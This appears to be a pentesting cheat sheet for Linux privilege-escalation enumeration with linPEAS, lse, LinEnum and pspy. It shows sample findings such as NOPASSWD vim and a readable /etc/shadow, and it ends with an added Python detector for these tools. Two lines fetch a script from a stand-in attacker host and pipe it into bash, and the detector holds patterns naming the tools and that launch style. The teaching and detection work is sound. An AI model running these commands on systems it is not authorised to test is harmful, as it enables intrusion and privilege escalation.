AUTOMATED ENUMERATION
Run linPEAS
Most comprehensive auto-enum — Highlights privesc vectors in color
curl http://ATTACKER_IP/linpeas.sh | bash
or: ./linpeas.sh | tee linpeas_output.txt
Example Output
linpeas output (color coded):
[+] Possible sudo pwnage:
(root) NOPASSWD: /usr/bin/vim
[+] SUID files:
/usr/bin/pkexec
[+] Writable cron scripts:
/opt/backup.sh
Run linux-smart-enumeration
Alternative to linPEAS — Different perspective
curl http://ATTACKER_IP/lse.sh | bash
Example Output
./lse.sh
[!] usr010 Can we read /etc/shadow?... yes!
[!] fst020 Uncommon setuid binaries... /opt/custom_app
[!] ctn000 Is the user in a docker group?... yes!
(Runs different checks than linPEAS; use both)
Run LinEnum
Thorough mode — Classic enum script
bash LinEnum.sh -t
Example Output
bash LinEnum.sh -t
[+] Current user/group info:
uid=33(www-data)
[+] Possible sudo pwnage:
/usr/bin/vi
[+] SUID files:
/usr/bin/pkexec
pspy (process snooping)
Watch processes without root — Catch cron jobs and background tasks
./pspy64
./pspy32
Example Output
./pspy64
2026/02/24 10:00:01 CMD: UID=0 PID=1234 /bin/bash /opt/cleanup.sh
2026/02/24 10:05:01 CMD: UID=0 PID=1235 /usr/bin/python3 /root/backup.py
(Reveals root cron jobs that aren't in crontab)
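Detecting this tooling from the defender's side, as an added example that is not part of the original page or of any of the projects named above: the detector reads process-execution events in the line layout of the pspy example and flags the tool file names used on this page plus the "curl URL | bash" launch pattern. The function names, the 2-second correlation window and the sample events are assumptions made for the illustration; in practice the events would come from auditd or EDR process telemetry.

```python
import re
from datetime import datetime, timedelta

# Line layout of the pspy example above; real pspy output may put "| " before the command.
LINE_RE = re.compile(r"^(\d{4}/\d\d/\d\d \d\d:\d\d:\d\d) CMD: UID=(\d+)\s+PID=(\d+)\s+(?:\|\s*)?(.*)$")
# Tool file names that appear on this page.
TOOL_RE = re.compile(r"(?:^|[/\s])(linpeas\.sh|lse\.sh|LinEnum\.sh|pspy(?:32|64))(?=\s|$)", re.I)
# curl/wget invoked with an http(s) URL.
FETCH_RE = re.compile(r"^(?:\S*/)?(?:curl|wget)\s.*https?://\S+")
# A shell started with no arguments: how the right side of "curl URL | bash" shows up.
BARE_SHELL_RE = re.compile(r"^(?:\S*/)?(?:ba)?sh$")
PIPE_WINDOW = timedelta(seconds=2)  # assumed correlation window

# Constructed sample events (not captured from a real host).
SAMPLE = """\
2026/02/24 10:00:01 CMD: UID=0 PID=1234 /bin/bash /opt/cleanup.sh
2026/02/24 10:02:10 CMD: UID=33 PID=2001 curl http://203.0.113.5/linpeas.sh
2026/02/24 10:02:10 CMD: UID=33 PID=2002 bash
2026/02/24 10:03:30 CMD: UID=33 PID=2050 bash LinEnum.sh -t
2026/02/24 10:04:00 CMD: UID=33 PID=2060 ./pspy64
2026/02/24 10:05:01 CMD: UID=0 PID=1235 /usr/bin/python3 /root/backup.py
""".splitlines()

def parse(line):
    """Return (timestamp, uid, pid, cmdline) or None for a line in another layout."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y/%m/%d %H:%M:%S")
    return ts, int(m.group(2)), int(m.group(3)), m.group(4).strip()

def detect(lines):
    """Return a list of (pid, rule, cmdline) alerts in event order."""
    events = [e for e in map(parse, lines) if e]
    fetches = [(ts, uid) for ts, uid, _, cmd in events if FETCH_RE.match(cmd)]
    alerts = []
    for ts, uid, pid, cmd in events:
        m = TOOL_RE.search(cmd)
        if m:
            alerts.append((pid, "enum-tool:" + m.group(1).lower(), cmd))
        # Same user ran a download and a bare shell within the window, in either order.
        if BARE_SHELL_RE.match(cmd) and any(
                u == uid and abs(ts - t) <= PIPE_WINDOW for t, u in fetches):
            alerts.append((pid, "pipe-to-shell", cmd))
    return alerts

if __name__ == "__main__":
    for pid, rule, cmd in detect(SAMPLE):
        print(f"ALERT pid={pid} rule={rule} cmd={cmd!r}")
```

File-name rules are defeated by renaming the script, and the pipe-to-shell rule also fires on installers launched the same way, so treat both as triage signals rather than verdicts.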